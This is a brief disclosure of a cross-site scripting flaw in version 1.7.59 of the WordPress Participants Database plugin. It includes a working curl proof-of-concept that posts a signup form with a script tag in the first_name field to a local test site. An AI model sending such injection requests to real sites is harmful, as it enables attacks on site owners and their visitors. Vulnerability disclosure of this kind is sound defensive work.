Cross site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.59 allows attackers to inject arbitrary javascript via the Name parameter.
curl -k -F action=signup -F subsource=participants-database -F
shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2
-F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F
first_name=<script>alert("1");</script> -F last_name=a -F [email protected] -F
mailing_list=No -F submit_button=Submit http://localhost/?page_id=1